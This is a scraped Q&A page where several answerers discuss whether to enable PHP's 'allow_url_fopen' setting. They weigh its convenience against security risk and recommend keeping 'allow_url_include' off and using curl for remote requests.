Logo Questions Linux Laravel Mysql Ubuntu Git Menu
HTML CSS JAVASCRIPT SQL PYTHON PHP BOOTSTRAP JAVA JQUERY R React Kotlin
 

Should I allow 'allow_url_fopen' in PHP?

Tags:

php

configuration

People also ask

What is the use of allow_url_fopen?

allow_url_fopen can be used to retrieve data from remote servers or websites. However, if incorrectly used, this function can compromise the security of your site.

Is allow_url_fopen safe?

allow_url_fopen is fine. If you need the feature, enable it. There are better tools out there for loading data from remote URLs (like the curl extension), but it's good enough for some simple use cases. Its close relative, allow_url_include , is not safe.

How do I enable url fopen?

Firstly, you have to access your cPanel control panel. Then, find the option MultiPHP INI Editor. Now, you have to click in the tab Editor Mode. Then, select the domain where you wish to enable allow_url_fopen in cPanel.

What is the directive that is used to enable disable file uploading in the PHP INI file?

PHP disable_functions directive You can disable specific PHP functions by using the disable_functions directive in a custom php. ini file.

I think the answer comes down to how well you trust your developers to use the feature responsibly? Data from a external URL should be treated like any other untrusted input and as long as that is understood, what's the big deal?

The way I see it is that if you treat your developers like children and never let them handle sharp things, then you'll have developers who never learn the responsibility of writing secure code.


You definitely want allow_url_include set to Off, which mitigates many of the risks of allow_url_fopen as well.

But because not all versions of PHP have allow_url_include, best practice for many is to turn off fopen. Like with all features, the reality is that if you don't need it for your application, disable it. If you do need it, the curl module probably can do it better, and refactoring your application to use curl to disable allow_url_fopen may deter the least determined cracker.


It depends on the type of development. If your prototyping then enabling 'allow_url_fopen' is fine however there isn't a significant speed difference between libcurl and file_get_contents and enabling it is only a matter of convenience.

For production servers any call to libcurl should be flagged for a security audit. As should fopen and file_get_contents if 'allow_url_fopen' is enabled. Disabling 'allow_url_fopen' does not prevent exploits it only slightly limits the number of ways they can be done.


Cross-site scripting attacks are a pain, so that's a vote against. And you should absolutely have "allow_url_include" set to off, or you'll be in for a world of hurt.

Related questions

cloning laravel project from github
How to read only 5 last line of the text file in PHP?
Fatal error: Class 'PHPMailer' not found
Cyrillic transliteration in PHP
how to get length of integers in PHP ?
Facebook + UserBundle authentication with symfony2
How to download large files through PHP script [duplicate]
PHP php_network_getaddresses: getaddrinfo failed: No such host is known
Stripe: No such token.. a similar object exists in test mode, but a live mode key was used to make this request
PHP Syntax checking pre-source control
Running PHPUnit within a Docker container with PhpStorm
Retrieving Facebook / Google+ / Linkedin profile picture having email address only
Equivalent of PHP error_log for info logs?
How do I verify Android in-app-billing transactions on MY server?
phpStorm, do not index a folder / tree [closed]
Associative Array versus SplObjectStorage
How to mark code as stable using Composer?
Where to learn Yii? [closed]
What keeps a php session alive?
Migration Foreign Key Vs Eloquent Relationships in Laravel

Donate For Us

If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!